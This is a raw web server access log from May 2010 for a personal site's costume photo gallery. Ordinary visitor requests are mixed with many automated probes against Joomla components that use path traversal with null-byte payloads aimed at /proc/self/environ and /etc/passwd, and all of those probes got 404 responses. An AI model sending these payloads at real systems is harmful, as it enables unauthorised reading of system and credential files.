188.122.78.2 - - [19/May/2010:11:59:16 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [19/May/2010:12:01:02 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.238.197.66 - - [19/May/2010:12:05:50 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:05:51 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:05:51 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:05:52 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:05:56 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:01 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:02 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.121.67.233 - - [19/May/2010:12:06:04 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
174.121.67.233 - - [19/May/2010:12:06:04 -0500] "GET /index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
174.121.67.233 - - [19/May/2010:12:06:04 -0500] "GET /logs/index2.php?option=com_myblog&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
207.238.197.66 - - [19/May/2010:12:06:11 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:54 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/044_JPG%20copy.jpg HTTP/1.1" 200 46286 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/042_JPG%20copy.jpg HTTP/1.1" 200 43788 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/037_JPG%20copy.jpg HTTP/1.1" 200 46400 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/040_JPG%20copy.jpg HTTP/1.1" 200 49303 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/038_JPG%20copy.jpg HTTP/1.1" 200 46731 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/039_JPG%20copy.jpg HTTP/1.1" 200 46480 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/041_JPG%20copy.jpg HTTP/1.1" 200 47808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/043_JPG%20copy.jpg HTTP/1.1" 200 45534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/046_JPG%20copy.jpg HTTP/1.1" 200 46590 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/047_JPG%20copy.jpg HTTP/1.1" 200 46201 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:06:55 -0500] "GET /costume/048_JPG%20copy.jpg HTTP/1.1" 200 50534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
207.238.197.66 - - [19/May/2010:12:07:21 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.23.9.198 - - [19/May/2010:12:10:24 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:10:25 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
206.123.118.132 - - [19/May/2010:12:10:43 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:12:10:53 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:10:53 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:10:56 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:10:57 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:10:58 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:10:59 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:10:59 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:11:01 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
75.126.213.59 - - [19/May/2010:12:11:02 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:12:11:51 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:12:00 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:12:12:00 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
87.250.255.243 - - [19/May/2010:12:13:46 -0500] "GET /logs/ HTTP/1.1" 200 6146 "-""Yandex/1.01.001 (compatible; Win16; I)"
206.123.118.132 - - [19/May/2010:12:19:22 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:12:19:22 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:12:19:22 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:12:20:42 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
178.32.3.34 - - [19/May/2010:12:20:42 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:12:20:42 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
178.32.3.34 - - [19/May/2010:12:20:42 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:12:20:42 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
178.32.3.34 - - [19/May/2010:12:20:43 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:20:43 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:20:43 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:20:43 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:20:43 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:20:43 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:12:20:43 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:12:20:58 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:20:58 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:20:58 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:21:33 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:21:33 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:21:33 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:21:39 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:21:39 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:12:21:39 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:12:21:49 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:49 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:49 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:49 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:49 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:49 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:51 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:12:21:51 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
